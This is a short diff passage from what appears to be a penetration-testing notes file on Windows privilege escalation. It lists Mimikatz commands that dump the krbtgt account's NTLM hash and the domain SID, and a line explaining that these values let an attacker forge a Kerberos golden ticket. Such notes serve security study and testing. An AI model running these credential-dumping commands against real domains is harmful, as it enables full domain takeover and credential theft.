it-kombinat/pcs/src/windows/privesc.md

 privilege::debug
 lsadump::lsa /inject /name:krbtgt
 ```
+This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket.

 Copy the SID of the domain and the NTLM hash of the ticket granting ticket account